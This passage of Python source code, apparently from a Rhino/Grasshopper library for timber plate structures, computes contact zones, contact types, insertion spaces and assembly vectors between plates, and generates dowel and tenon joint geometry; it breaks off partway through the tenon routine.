if rs.CurveBrepIntersect(self.plates[i].top_contour,self.plates[j].bottom_face) != None:
if rs.CurveBrepIntersect(self.plates[i].bottom_contour,self.plates[j].top_face) != None:
if rs.CurveBrepIntersect(self.plates[i].bottom_contour,self.plates[j].bottom_face) != None:
sub.append(j)
mylist.append(sub)
return mylist
def __get_contact_pairs(self):
mylist = []
for i in range(self.count):
sub = []
for j in range(len(self.contact_ids[i])):
brep_id = self.contact_ids[i][j]
sub.append( '(' + str(i) + ',' + str(brep_id) + ')' )
mylist.append(sub)
return mylist
def __get_contact_breps(self):
mylist = []
for i in range(self.count):
sub = []
for j in range(len(self.contact_ids[i])):
brep_id = self.contact_ids[i][j]
brep = rs.coercebrep(rs.CopyObject(self.breps[brep_id]))
sub.append(brep)
mylist.append(sub)
return mylist
def __get_contact_zones(self):
mylist = []
for i in range(self.count):
sub = []
for j in range(len(self.contact_ids[i])):
brep_id = self.contact_ids[i][j]
pi = copy.deepcopy(self.plates[i])
pj = copy.deepcopy(self.plates[brep_id])
intersect = rs.IntersectBreps(pi.brep,pj.brep)
if intersect != None:
if len(intersect) == 1:
if rs.IsCurveClosed(intersect) is True:
if rs.IsCurvePlanar(intersect) is True:
zone = rs.coercegeometry(rs.AddPlanarSrf(intersect)[0])
sub.append(zone)
# intersecting breps
else:
# if plate contours are intersecting the surfaces of the other plate
if rs.CurveBrepIntersect(pi.top_contour, pj.top_face) != None:
if rs.CurveBrepIntersect(pi.top_contour, pj.bottom_face) != None:
if rs.CurveBrepIntersect(pi.bottom_contour, pj.top_face) != None:
if rs.CurveBrepIntersect(pi.bottom_contour, pj.bottom_face) != None:
volume = rg.Brep.CreateBooleanIntersection(pi.brep,pj.brep,0.1)[0]
edges = Toolbox.Breps.brep_edges(volume)
edges.sort(key=rs.CurveLength)
edges.reverse()
vec_dir = Toolbox.Vectors.round_vector(rs.VectorUnitize(Toolbox.Vectors.cross(pi.top_normal, pj.top_normal)),6)
four_edges = []
for edge in edges:
vec_line = Toolbox.Vectors.round_vector(rs.VectorUnitize(Toolbox.Vectors.line_to_vec(edge)),6)
if vec_dir == vec_line or vec_dir == rs.VectorReverse(vec_line):
four_edges.append(edge)
if len(four_edges) == 4: break
mids = [rs.CurveMidPoint(four_edges[k]) for k in range(4)]
center = Toolbox.Points.average_point(mids)
proj = rs.coerce3dpointlist([rs.EvaluateCurve(four_edges[l],rs.CurveClosestPoint(four_edges[l],center)) for l in range(4)])
poly = rs.AddPolyline(rs.PolylineVertices(gh.ConvexHull(proj, rs.PlaneFitFromPoints(proj))[0]))
zone = rs.coercegeometry(rs.AddPlanarSrf(poly)[0])
#orient surface normal
current_normal = rs.SurfaceNormal(zone,[0,0])
new_vec = Toolbox.Vectors.line_to_vec(four_edges[0],True)
test_point = rs.CurveStartPoint(four_edges[0])
test1 = rs.IsPointOnCurve(pi.top_contour, test_point)
test2 = rs.IsPointOnCurve(pi.bottom_contour, test_point)
if test1 is True or test2 is True:
new_vec =rs.VectorReverse(new_vec)
if rs.IsVectorParallelTo(current_normal, new_vec) == -1:
rs.FlipSurface(zone,True)
sub.append(zone)
mylist.append(sub)
return mylist
def __get_contact_types(self):
mylist = []
for i in range(self.count):
sub = []
for j in range(len(self.contact_ids[i])):
nb = self.contact_ids[i][j]
zone = self.contact_zones[i][j]
zone_normal = rs.SurfaceNormal(zone,[0,0])
plate1_normal = self.plates[i].top_normal
plate2_normal = self.plates[nb].top_normal
cross1 = Toolbox.Vectors.cross(zone_normal,plate1_normal)
cross2 = Toolbox.Vectors.cross(zone_normal,plate2_normal)
if Toolbox.Vectors.isvectornull(cross1) is False and Toolbox.Vectors.isvectornull(cross2) is False :
intersect = rs.IntersectBreps(self.breps[i],self.breps[nb])
if rs.IsCurvePlanar(intersect) is True: sub.append('SS')
else: sub.append('IN')
elif Toolbox.Vectors.isvectornull(cross1) is True and Toolbox.Vectors.isvectornull(cross2) is True :
sub.append('FF')
else:
#edge test:
top_top = Toolbox.Curves.isSharingEdge(self.plates[i].top_contour, self.plates[nb].top_contour)
top_bottom = Toolbox.Curves.isSharingEdge(self.plates[i].top_contour, self.plates[nb].bottom_contour)
bottom_top = Toolbox.Curves.isSharingEdge(self.plates[i].bottom_contour, self.plates[nb].top_contour)
bottom_bottom = Toolbox.Curves.isSharingEdge(self.plates[i].bottom_contour, self.plates[nb].bottom_contour)
if Toolbox.Vectors.isvectornull(cross1) is True and Toolbox.Vectors.isvectornull(cross2) is False :
if top_top == False and top_bottom == False and bottom_top == False and bottom_bottom == False:
sub.append('FS')
else: sub.append('ES')
elif Toolbox.Vectors.isvectornull(cross1) is False and Toolbox.Vectors.isvectornull(cross2) is True :
if top_top == False and top_bottom == False and bottom_top == False and bottom_bottom == False:
sub.append('SF')
else: sub.append('SE')
mylist.append(sub)
return mylist
def __get_contact_strings(self):
mylist = []
for i in range(self.count):
sub = []
for j in range(len(self.contact_ids[i])):
brep_id = self.contact_ids[i][j]
ptype = self.contact_types[i][j]
if ptype == 'SS':
sub.append('Side of plate '+str(i)+' is connected to Side of plate '+str(brep_id))
elif ptype == 'FS':
sub.append('Face of plate '+str(i)+' is connected to Side of plate '+str(brep_id))
elif ptype == 'ES':
sub.append('Edge of plate '+str(i)+' is connected to Side of plate '+str(brep_id))
elif ptype == 'SF':
sub.append('Side of plate '+str(i)+' is connected to Face of plate '+str(brep_id))
elif ptype == 'SE':
sub.append('Side of plate '+str(i)+' is connected to Edge of plate '+str(brep_id))
elif ptype == 'FF':
sub.append('Face of plate '+str(i)+' is connected to Face of plate '+str(brep_id))
elif ptype == 'IN':
sub.append('Volume of plate '+str(i)+' is intersecting volume of plate '+str(brep_id))
mylist.append(sub)
return mylist
def __get_contact_centers(self):
mylist = []
for i in range(self.count):
sub = []
for j in range(len(self.contact_ids[i])):
center = Toolbox.Surfaces.surface_centroid(self.contact_zones[i][j])
sub.append(rs.coerce3dpoint(center))
mylist.append(sub)
return mylist
def __get_contact_normals(self):
mylist = []
for i in range(self.count):
sub = []
for j in range(len(self.contact_ids[i])):
brep_id = self.contact_ids[i][j]
zone = self.contact_zones[i][j]
vec = rs.VectorUnitize(rs.SurfaceNormal(zone,[0,0]))
plate_center = self.plates[i].plate_center
zone_center = Toolbox.Surfaces.surface_centroid(zone)
if self.contact_types[i][j] != "IN":
if Toolbox.Vectors.is_vector_outward(plate_center, zone_center, copy.deepcopy(vec)) is False:
vec=rs.VectorReverse(copy.deepcopy(vec))
sub.append(rs.coerce3dvector(vec))
mylist.append(sub)
return mylist
def __get_contact_planes(self):
mylist = []
for i in range(self.count):
sub = []
for j in range(len(self.contact_ids[i])):
nb = self.contact_ids[i][j]
origin = self.contact_centers[i][j]
zone = Toolbox.Surfaces.get_face_largest_contour(self.contact_zones[i][j])
sides = rs.ExplodeCurves(rs.CopyObject(zone))
longest_side = Toolbox.Curves.sort_curves_by_length(sides)[-1][0]
x_axis = rs.VectorCreate(rs.CurveStartPoint(longest_side), rs.CurveEndPoint(longest_side))
plane = rs.PlaneFromNormal(origin, self.contact_normals[i][j], x_axis)
if self.contact_types[i][j] == 'ES':
if Toolbox.Vectors.is_vector_outward(self.plates[i].mid_plane.Origin, self.contact_centers[i][j], plane.YAxis) is False:
plane = rs.PlaneFromNormal(origin, self.contact_normals[i][j], -x_axis)
if self.contact_types[i][j] == 'SE':
if Toolbox.Vectors.is_vector_outward(self.plates[nb].mid_plane.Origin, self.contact_centers[i][j], plane.YAxis) is True:
plane = rs.PlaneFromNormal(origin, self.contact_normals[i][j], -x_axis)
sub.append(rs.coerceplane(plane))
mylist.append(sub)
return mylist
def __get_contact_spheres(self, constraints):
if constraints.BranchCount != 5: constraints = [[],[],[],[],[]]
else: constraints = Toolbox.Data.datatree_to_list(constraints)
# Create canonic insertion space
sphere = rs.AddSphere((0,0,0),1)
cutter = rs.AddPlanarSrf(rs.AddPolyline([(1,1,0),(1,-1,0),(-1,-1,0),(-1,1,0),(1,1,0)]))
hemisphere = rs.SplitBrep(sphere,cutter)[1]
hemicircle_horizontal = rs.RotateObject(rs.AddArc(rs.WorldZXPlane(),1,180),(0,0,0),-90,(0,1,0))
hemicircle_vertical = rs.RotateObject(rs.AddArc(rs.WorldYZPlane(),1,180),(0,0,0),0,(1,0,0))
normal_point= rs.AddPoint(0,0,1)
# Orient hemisphere on each conctact zone
mylist = []
for i in range(self.count):
sub = []
for j in range(len(self.contact_types[i])):
#face-to-face
if self.contact_types[i][j] == 'FF':
if constraints[0] != []:
insertion_space = constraints[0]
else: insertion_space = hemisphere
#face-to-side
elif (self.contact_types[i][j] == 'FS' or self.contact_types[i][j] == 'SF'):
if constraints[1] != []:
insertion_space = constraints[1]
else: insertion_space = hemicircle_horizontal
#edge-to-side
elif (self.contact_types[i][j] == 'ES' or self.contact_types[i][j] == 'SE'):
if constraints[2] != []:
insertion_space = constraints[2]
else: insertion_space = hemisphere
#side-to-side
elif self.contact_types[i][j] == 'SS':
if constraints[3] != []:
insertion_space = constraints[3]
else: insertion_space = hemicircle_vertical
#intersecting
elif self.contact_types[i][j] == 'IN':
if constraints[4] != []:
insertion_space = constraints[4]
else: insertion_space = normal_point
#Exception for SF/FS where the default constraint is oriented with the male plane
if constraints[1] == [] and (self.contact_types[i][j] == 'FS' or self.contact_types[i][j] == 'SF'):
nb = self.contact_ids[i][j]
if self.contact_types[i][j] == 'SF': male_normal = self.plates[i].top_plane.ZAxis
else: male_normal = self.plates[nb].top_plane.ZAxis
pl_origin = self.contact_planes[i][j].Origin
pl_X = self.contact_planes[i][j].XAxis
pl_Z = rs.VectorCrossProduct(male_normal, pl_X)
proj_plane = rs.PlaneFromNormal(pl_origin, pl_Z, pl_X)
test_point = rs.CopyObject(pl_origin, -self.contact_normals[i][j])
if Toolbox.Vectors.is_vector_outward(test_point, pl_origin, pl_Z) is False:
proj_plane = rs.PlaneFromNormal(pl_origin, -pl_Z, -pl_X)
matrix = rg.Transform.PlaneToPlane(rs.WorldXYPlane(), proj_plane)
insertion_space = rs.TransformObject(insertion_space, matrix,True)
#normal Orientation of all other insertion constraints
else:
matrix = rg.Transform.PlaneToPlane(rs.WorldXYPlane(), self.contact_planes[i][j])
insertion_space = rs.TransformObject(insertion_space, matrix,True)
#Exception for SE/ES where the default constraint is trimmed by plate planes
if constraints[2] == [] and (self.contact_types[i][j] == 'ES' or self.contact_types[i][j] == 'SE'):
test_point = rs.CopyObject(self.contact_centers[i][j], - self.contact_planes[i][j].YAxis)
if self.contact_types[i][j] == 'SE':
trim_plane = self.plates[i].mid_plane
else: trim_plane = self.plates[self.contact_ids[i][j]].mid_plane
trim_plane = rs.MovePlane(trim_plane, self.contact_centers[i][j])
if Toolbox.Vectors.is_vector_outward(test_point, self.contact_centers[i][j], trim_plane.ZAxis) is True:
trim_plane = rs.RotatePlane(trim_plane, 180, trim_plane.XAxis)
insertion_space = rs.TrimBrep(insertion_space, trim_plane)
sub.append(insertion_space)
mylist.append(sub)
return mylist
# MODULES ASSEMBLY -------------------------------------------
def __get_assembly_vectors(self):
adj = self.contact_ids
seq = ast.literal_eval(self.sequence)
steps = Toolbox.Data.seq_to_steps(seq)
steps = Toolbox.Data.order_sequence(steps)
sub_seq = []
for i in range(len(steps)):
if steps[i] in Toolbox.Data.deepest_steps(seq): pass
else: sub_seq.append(Toolbox.Data.get_item_from_path(seq, steps[i]))
sub_seq.append(seq)
# Assembly vectors following modules list
iv = copy.deepcopy(sub_seq)
space = copy.deepcopy(sub_seq)
rel = copy.deepcopy(sub_seq)
for i in range(len(sub_seq)):
for j in range(len(sub_seq[i])):
# first element in subsequence
if j == 0:
iv[i][j] = "gravity"
rel[i][j] = []
space[i][j] = []
else:
# look for all connection between the plate (or a plate of the module) to insert and the plates in place
rel_list = [] #
is_list = [] #insertion spaces
# element in subsequence is a module
if type(sub_seq[i][j]) is list:
plates = Toolbox.Data.flatten_integer_list(sub_seq[i][j])
for plate in plates:
neighbours = adj[plate]
prequel = sub_seq[i][:j]
# find all corespondance between the neighbour group and the prequel group
for k in range(len(neighbours)):
for l in range(len(prequel)):
# element in prequel is a module
if type(prequel[l]) is list:
prequel[l] = Toolbox.Data.flatten_integer_list(prequel[l])
for m in range(len(prequel[l])):
if prequel[l][m] == neighbours[k]:
to_zero = rs.VectorCreate((0,0,0),self.contact_centers[plate][k])
sphere = rs.CopyObject(self.contact_spheres[plate][k],to_zero)
is_list.append(sphere)
rel_list.append(neighbours[k])
# element in prequel is a plate
else:
if prequel[l] == neighbours[k]:
to_zero = rs.VectorCreate((0,0,0),self.contact_centers[plate][k])
sphere = rs.CopyObject(self.contact_spheres[plate][k],to_zero)
is_list.append(sphere)
rel_list.append(neighbours[k])
# element in subsequence is a plate
else:
plate = sub_seq[i][j]
neighbours = adj[plate]
prequel = sub_seq[i][:j]
# find the first corespondance between the neighbour group and the prequel group
for k in range(len(neighbours)):
for l in range(len(prequel)):
# element in prequel is a module
if type(prequel[l]) is list:
for m in range(len(prequel[l])):
if prequel[l][m] == neighbours[k]:
to_zero = rs.VectorCreate((0,0,0),self.contact_centers[plate][k])
sphere = rs.CopyObject(self.contact_spheres[plate][k],to_zero)
is_list.append(sphere)
rel_list.append(neighbours[k])
# element in prequel is a plate
else:
if prequel[l] == neighbours[k]:
to_zero = rs.VectorCreate((0,0,0),self.contact_centers[plate][k])
sphere = rs.CopyObject(self.contact_spheres[plate][k],to_zero)
is_list.append(sphere)
rel_list.append(neighbours[k])
# If plate/module has no contact, add a default vector and a support
if is_list == []:
iv[i][j] = "gravity"
space[i][j] = []
rel[i][j] = []
self.modules[i].needed_supports += 1
# If plate/module has contacts, intersect insertion spheres and take average candidate
else:
try:
inter = self.intersect_insertion_spaces(is_list)
iv[i][j] = inter[0] #average vector
space[i][j] = inter[1] #candidates
rel[i][j] = rel_list
except:
self.temp = is_list
iv[i][j] = "gravity"
space[i][j] = []
rel[i][j] = rel_list
#raise Exception('Insertion space intersection returns no compatible vector for plate(s) '+str(sub_seq[i][j])+' with plates '+str(rel[i][j]))
# if average vector failed or was null, take gravity instead
if iv[i][j] == None: iv[i][j] = "gravity"
# Update modules attributes
for i in range(len(self.modules)):
self.modules[i].assembly_vectors = iv[i]
self.modules[i].assembly_relatives = rel[i]
self.modules[i].assembly_spaces = space[i]
# Assembly vectors following contact list
iv2 = copy.deepcopy(self.contact_planes)
rel2 = copy.deepcopy(self.contact_planes)
# Compare each contact zone...
for i in range(self.count):
for j in range(len(adj[i])):
# ... with each module sequence.
search = True
for k in range(len(self.modules)):
# to retrieve the associated assembly vector
if search is True:
mod_seq = ast.literal_eval(self.modules[k].sequence)
plates_in_sequence = Toolbox.Data.flatten_integer_list(mod_seq)
if (i in plates_in_sequence) and (adj[i][j] in plates_in_sequence):
for l in range(len(mod_seq)):
corresponding_vector = copy.deepcopy(self.modules[k].assembly_vectors[l])
if type(mod_seq[l]) is list:
plates_in_sub_sequence = Toolbox.Data.flatten_integer_list(mod_seq[l])
if i < adj[i][j] and adj[i][j] in plates_in_sub_sequence:
iv2[i][j] = corresponding_vector
rel2[i][j] = adj[i][j]
search = False
elif i > adj[i][j] and i in plates_in_sub_sequence:
iv2[i][j] = rs.VectorReverse(corresponding_vector)
rel2[i][j] = adj[i][j]
search = False
else:
if i < adj[i][j] and mod_seq[l] == adj[i][j]:
iv2[i][j] = corresponding_vector
rel2[i][j] = adj[i][j]
search = False
elif i > adj[i][j] and mod_seq[l] == i:
iv2[i][j] = rs.VectorReverse(corresponding_vector)
rel2[i][j] = adj[i][j]
search = False
#self.assembly_relatives = rel2
self.contact_vectors = iv2
#coerce geometry of contact spheres to avoid guid instance problem.
for i in range(len(self.contact_spheres)):
for j in range(len(self.contact_spheres[i])):
self.contact_spheres[i][j]=rs.coercegeometry(self.contact_spheres[i][j])
#assign model attributes
self.assembly_vectors = self.modules[0].assembly_vectors
self.assembly_spaces = self.modules[0].assembly_spaces
self.assembly_relatives = self.modules[0].assembly_relatives
def intersect_insertion_spaces(self, insertion_spaces):
"""
Hypothesis:
insertion spaces are points, curves and surfaces
pts, crvs and srfs are parts of a sphere of radius 1
crvs are geodesics on that sphere
crvs are smaller than the hemisphere (L = pi.r)
srfs have convex perimeters and no holes
srfs are smaller than the hemisphere (A = 2.pi.r^2)
Method:
we start from the most constraining (point to surface)
we avoid surface intersection using geodesic points
"""
# Sort insertion_spaces
pts,crvs,srfs = [],[],[]
for space in insertion_spaces:
if rs.IsPoint(space) is True:
pts.append(space)
elif rs.IsCurve(space) is True:
crvs.append(space)
elif rs.IsBrep(space) is True:
srfs.append(space)
geodesic_cloud = Toolbox.Points.geodesic_sphere_points()
tol = 0.001 # intersection tolerance
dso = 2 # design space order
candidates = []
# Intersection functions:
def pt_pt(pt1, pt2, tol):
if rs.Distance(pt1,pt2) > tol:
raise Exception('No pt-pt intersection was found')
def pt_crv(pt,crv):
if rs.IsPointOnCurve(crv, pt) is False:
raise Exception('No pt-crv intersection was found')
def pts_crv(pts, crv, warning=True):
new_pts = []
for pt in pts:
if rs.IsPointOnCurve(crv, pt) is True:
new_pts.append(pt)
if new_pts == [] and warning == True:
raise Exception('No pts-crv intersection was found')
else: return new_pts
def pt_srf(pt,srf):
if rs.IsPointOnSurface(srf, pt) is False:
raise Exception('No pt-srf intersection was found')
def pts_srf(pts, srf, tol, warning=True):
new_pts = []
for pt in pts:
srf_pt = rs.BrepClosestPoint(srf,pt)[0]
if rs.Distance(pt,srf_pt) < tol:
new_pts.append(pt)
if new_pts == [] and warning==True:
raise Exception('No pts-srf intersection was found')
else: return new_pts
def crv_crv(crv1, crv2, warning=True):
inter = rs.CurveCurveIntersection(crv1,crv2)
if inter == None and warning == True:
raise Exception('No crv-crv intersection was found')
else: return inter
def crv_srf():
pass
def srf_srf():
pass
def dist_to_srf(srf,pt):
srf_pt = rs.BrepClosestPoint(srf,pt)[0]
return rs.Distance(srf_pt,pt)
def dist_to_crv(crv,pt):
t = rs.CurveClosestPoint(crv,pt)
return rs.Distance(rs.EvaluateCurve(crv,t),pt)
def crv_to_pts(crv):
segments = rs.CurveLength(crv) /0.01
pts = rs.DivideCurve(crv,segments)
return pts
def srf_to_pts(srf,geodesic_cloud,edge=True):
pts=[]
border = rs.DuplicateSurfaceBorder(srf,1)
if edge is True:
border_pts = crv_to_pts(border)
for pt in border_pts:
pts.append(pt)
for pt in geodesic_cloud:
pt = rs.AddPoint(pt)
srf_pt = rs.BrepClosestPoint(srf,pt)[0]
if rs.Distance(srf_pt,pt) < tol:
t =rs.CurveClosestPoint(border,pt)
border_pt = rs.EvaluateCurve(border,t)
if rs.Distance(border_pt,pt) > tol:
pts.append(pt)
return pts
# Start from points
if len(pts) != 0:
dso = 0
candidates.append(pts[0])
#check points
for i in range(len(pts)-1):
pt_pt(candidates[0],pts[i+1],tol)
# check curves
for crv in crvs:
pt_crv(candidates[0],crv)
# check surfaces
for srf in srfs:
pt_srf(candidates[0],srf)
# Start from curves
elif len(crvs) != 0:
dso = 1
candidates = crv_to_pts(crvs[0])
base_crv = crvs[0]
#check curves
for i in range(len(crvs)-1):
if dso == 1:
inter = crv_crv(base_crv,crvs[i+1])[0]
#intersection
if inter[0] == 1:
candidates = [inter[1]]
dso = 0
#overlap
else:
candidates = pts_crv(candidates,crvs[i+1])
new_start=rs.CurveClosestPoint(base_crv,candidates[0])
new_end=rs.CurveClosestPoint(base_crv,candidates[-1])
base_crv=rs.AddSubCrv(base_crv,new_start,new_end)
else: candidates = pts_crv(candidates,crvs[i+1])
# check surfaces
for srf in srfs:
candidates = pts_srf(candidates,srf,tol)
# Start from surfaces
elif len(srfs) != 0:
dso = 2
candidates = srf_to_pts(srfs[0],geodesic_cloud,edge=True)
# check surfaces
for i in range(len(srfs)-1):
candidates = pts_srf(candidates,srfs[i+1],tol,False)
#complete border
border_i = rs.DuplicateSurfaceBorder(srfs[i+1])
border_points = crv_to_pts(border_i)
for j in range(i+1):
border_points = pts_srf(border_points,srfs[j],tol,False)
candidates = candidates + border_points
if candidates == []: raise Exception('No srf-srf intersection was found')
else: raise Exception('Please provide at least one point/curve/surface')
if len(candidates) == 1:
chosen = candidates[0]
elif len(candidates) > 1:
l = len(candidates)
x = 0
y = 0
z = 0
for i in range(len(candidates)):
if rs.IsPoint(candidates[i]) is False:
candidates[i] = rs.AddPoint(candidates[i])
coord = rs.PointCoordinates(candidates[i])
candidates[i] = rs.coercegeometry(candidates[i])
x += coord[0]
y += coord[1]
z += coord[2]
x = x/l
y = y/l
z = z/l
chosen = rs.AddPoint(x,y,z)
vector = rs.VectorUnitize(rs.VectorCreate(chosen,(0,0,0)))
return (vector, candidates)
# Decorator -----------------------------------
def __skip_nones(fun):
"""
Decorator to use default value if parameter is null or is an empty list.
"""
def _(*args, **kwargs):
for a, v in zip(fun.__code__.co_varnames, args):
if v is not None and v!=[]:
kwargs[a] = v
return fun(**kwargs)
return _
# PLATE JOINERY ----------------------------------------------
@__skip_nones
def add_dowels(self,
plates_pairs='all',
dowel_number=1.0,
dowel_radius=0.5,
dowel_tolerance=0.0,
dowel_retreat_1=0.0,
dowel_retreat_2=0.0,
circle_radius=3.0,
circle_rotation=0.0,
dowel_angle_1=0.0,
dowel_angle_2=0.0,
parallel=False,
tile=False):
"""Add dowels on Face-to-Face contact zones."""
#cast plate_pairs to string
if plates_pairs != 'all':
for i in range(len(plates_pairs)):
plates_pairs[i] = str(plates_pairs[i])
#conditional loop
for i in range(self.count):
types = self.contact_types[i]
for j in range(len(types)):
nb = self.contact_ids[i][j]
#specific selection function
if ((plates_pairs == 'all')
or ('('+str(i)+','+str(nb)+')' == plates_pairs)
or ('('+str(i)+','+str(nb)+')' in plates_pairs)):
i_want_a_dowel = True
else: i_want_a_dowel = False
#for all specified Face-to-Face connection
if (types[j] == 'FF') and (nb > i) and (i_want_a_dowel is True):
#prerequisite
if dowel_radius <= 0 : raise Exception(' Dowel_radius must be greater than 0')
if dowel_number <= 0 : raise Exception(' Dowel_number must be greater than 0')
if dowel_tolerance < 0 : raise Exception(' Dowel_tolerance must be greater than 0')
if dowel_retreat_1 >= self.plates[i].thickness : raise Exception(' Dowel_retreat_1 must be smaller than plate '+str(i)+' thickness')
if dowel_retreat_2 >= self.plates[nb].thickness : raise Exception(' Dowel_retreat_2 must be smaller than plate '+str(nb)+' thickness')
if circle_radius <= 0 : raise Exception(' Circle_radius must be greater than 0')
if not (-180.0 <= dowel_angle_1 <= 180.0) : raise Exception(' Dowel_angle_1 must be between -180 and 180')
if not (-45.0 <= dowel_angle_2 <= 45.0) : raise Exception(' Dowel_angle_1 must be between -45 and 45')
#location
plane = self.contact_planes[i][j]
location=[]
if dowel_number == 1:
location.append(plane)
elif dowel_number > 1:
polygon = Toolbox.Curves.create_polygon(plane, circle_radius, dowel_number)
polygon = rs.RotateObject(polygon, plane.Origin, circle_rotation, plane.ZAxis)
vertices = rs.PolylineVertices(polygon)
for k in range(len(vertices)-1):
x_axis = rs.VectorCreate(plane.Origin,vertices[k])
new_plane = rs.PlaneFromNormal(vertices[k], plane.ZAxis, x_axis)
location.append(new_plane)
if tile != False :
tile = scriptcontext.doc.Objects.Add(tile)
for k in range(len(location)):
#construction lines
base_circle = tile
if tile == False :
base_circle = rs.AddCircle(location[k],float(dowel_radius))
else :
x_target = rs.CopyObject(location[k].Origin, location[k].XAxis)
y_target = rs.CopyObject(location[k].Origin, location[k].YAxis)
base_circle = Toolbox.Planes.orient(tile, rs.WorldXYPlane(), rs.RotatePlane(location[k], 90, location[k].ZAxis))
top_circle = rs.CopyObject(base_circle, self.contact_normals[i][j] * (self.plates[nb].thickness - dowel_retreat_2))
bottom_circle = rs.CopyObject(base_circle, -self.contact_normals[i][j] * (self.plates[i].thickness - dowel_retreat_1))
#inclination
if (-180 <= dowel_angle_1 <= 180) and (-45 <= dowel_angle_2 <= 45) :
if parallel is True :
ref = rs.PlaneFromFrame(plane.Origin,plane.XAxis,plane.YAxis)
ref = rs.RotatePlane(ref, dowel_angle_1, ref.ZAxis)
else :
x_axis = rs.VectorCreate(plane.Origin, location[k].Origin)
ref = rs.PlaneFromNormal(location[k].Origin, plane.ZAxis, x_axis)
top_move = (self.plates[nb].thickness - dowel_retreat_2) * math.tan(math.radians(dowel_angle_2)) * ref.XAxis
bottom_move = (self.plates[i].thickness - dowel_retreat_1) * math.tan(math.radians(dowel_angle_2)) * -ref.XAxis
rs.MoveObject(top_circle,top_move)
rs.MoveObject(bottom_circle,bottom_move)
#keys geometry
rail = rs.AddLine(rs.CurveAreaCentroid(bottom_circle)[0],rs.CurveAreaCentroid(top_circle)[0])
cylinder = rs.ExtrudeCurve(bottom_circle, rail)
rs.CapPlanarHoles(cylinder)
self.plates[nb].joints_keys.append(rs.coercebrep(cylinder))
#solid
base_circle_bool = Toolbox.Curves.offset(base_circle, - dowel_tolerance)
rail_top = rs.AddLine(rs.CurveAreaCentroid(base_circle)[0],rs.CurveAreaCentroid(top_circle)[0])
cylinder_top = rs.ExtrudeCurve(base_circle_bool, rail_top)
rail_bottom = rs.AddLine(rs.CurveAreaCentroid(base_circle)[0],rs.CurveAreaCentroid(bottom_circle)[0])
cylinder_bottom = rs.ExtrudeCurve(base_circle_bool, rail_bottom)
rs.CapPlanarHoles(cylinder_top)
rs.CapPlanarHoles(cylinder_bottom)
self.plates[i].joints_negatives.append(rs.coercebrep(cylinder_bottom))
self.plates[nb].joints_negatives.append(rs.coercebrep(cylinder_top))
#fabrication lines
top_poly = rs.ConvertCurveToPolyline(top_circle, 10)
bottom_poly = rs.ConvertCurveToPolyline(bottom_circle, 10)
base_poly = rs.ConvertCurveToPolyline(base_circle, 10)
if dowel_retreat_1 == 0 :
self.plates[i].top_holes.append(rs.coercecurve(base_poly))
self.plates[i].bottom_holes.append(rs.coercecurve(bottom_poly))
else:
self.plates[i].top_holes.append(rs.coercecurve(base_poly))
self.plates[i].bottom_holes.append(rs.coercecurve(bottom_poly))
if dowel_retreat_2 == 0 :
self.plates[nb].top_holes.append(rs.coercecurve(top_poly))
self.plates[nb].bottom_holes.append(rs.coercecurve(base_poly))
else:
self.plates[nb].top_holes.append(rs.coercecurve(top_poly))
self.plates[nb].bottom_holes.append(rs.coercecurve(base_poly))
self.log.append('Dowel joint added bewteen plates '+ str(i)+ ' and '+str(nb))
@__skip_nones
def add_tenons(self,
plates_pairs='all',
tenon_number=1.0,
tenon_length='default',
tenon_width=1.0,
tenon_spacing=1.0,
tenon_shift=0.0,):
"""Add tenon and mortise on Side-to-Face or Face-to-Side contact zones."""
#cast plate_pairs to string
if plates_pairs != 'all':
for i in range(len(plates_pairs)):
plates_pairs[i] = str(plates_pairs[i])
#conditional loop
for i in range(self.count):
types = self.contact_types[i]
for j in range(len(types)):
nb = self.contact_ids[i][j]
#specific selection function
if ((plates_pairs == 'all')
or ('('+str(i)+','+str(nb)+')' == plates_pairs)
or ('('+str(i)+','+str(nb)+')' in plates_pairs)
or ('('+str(nb)+','+str(i)+')' == plates_pairs)
or ('('+str(nb)+','+str(i)+')' in plates_pairs)):
i_want_a_tenon = True
else: i_want_a_tenon = False
#for all specified Side-to-Face connection
if (types[j] in 'SFS') and (nb > i) and i_want_a_tenon is True:
#prerequisite
if tenon_number <= 0 : raise Exception(' Tenon_number must be greater than 0')
if tenon_width <= 0 : raise Exception(' Tenon_width must be greater than 0')
#male-female parameters
if types[j] == 'SF':
male = i
female = nb
plane_zone = rs.PlaneFromFrame(self.contact_planes[i][j].Origin, self.contact_planes[i][j].XAxis, self.contact_planes[i][j].YAxis)
if types[j] == 'FS':
male = nb
female = i
plane_zone = rs.PlaneFromFrame(self.contact_planes[i][j].Origin, self.contact_planes[i][j].YAxis, self.contact_planes[i][j].XAxis)
plane_male = self.plates[male].top_plane
plane_female = self.plates[female].top_plane
thickness_female = self.plates[female].thickness
top_contour_male = copy.deepcopy(self.plates[male].top_contour)
bottom_contour_male = copy.deepcopy(self.plates[male].bottom_contour)
top_contour_mstart = rs.CurveStartPoint(top_contour_male)
bottom_contour_mstart= rs.CurveStartPoint(bottom_contour_male)
""""""
#joint location
zone = self.contact_zones[i][j]
rectangle = Toolbox.Curves.trapeze_to_rectangle(rs.JoinCurves(rs.DuplicateEdgeCurves(zone)))
if Toolbox.Curves.rectangle_dimensions(rectangle)[0] < (tenon_width*tenon_number + tenon_spacing*(tenon_number-1) + tenon_shift*2):
excess = (tenon_width*tenon_number + tenon_spacing*(tenon_number-1) + tenon_shift*2) / (Toolbox.Curves.rectangle_dimensions(rectangle)[0]) * 100
raise Exception(' Joint is to large ('+ str(int(excess)) +' %) for contact area between plate '+str(i)+' and plate '+str(nb))
center = rs.CurveAreaCentroid(rectangle)[0]
default_direction = Toolbox.Vectors.project_vector_to_plane(plane_zone.ZAxis, plane_male)
joint_plane = rs.PlaneFromNormal(center, plane_male.ZAxis, default_direction)
#direction for assembly
if types[j] == 'FS': direction = self.contact_vectors[i][j]
if types[j] == 'SF': direction = -self.contact_vectors[i][j]
#default length
if (tenon_length == 'default') or (tenon_length == 0) :
alpha = rs.VectorAngle(direction, plane_female[3])
new_tenon_length = abs(thickness_female / math.cos(math.radians(alpha)))
else: new_tenon_length = tenon_length
#tenon location
if tenon_number > 1 :
dist = (float(tenon_number-1) /2) * (tenon_width + tenon_spacing)
pointA = rs.CopyObject(joint_plane.Origin, joint_plane.YAxis * dist)
pointB = rs.CopyObject(joint_plane.Origin, -joint_plane.YAxis * dist)
line = rs.AddLine(pointA, pointB)
shifted_line = rs.CopyObject(line, joint_plane.YAxis * tenon_shift)
location = rs.DivideCurve(shifted_line, tenon_number-1)
else: location = [rs.CopyObject(joint_plane.Origin, joint_plane.YAxis * tenon_shift)]
#solid
for k in range(len(location)):
#tenon box
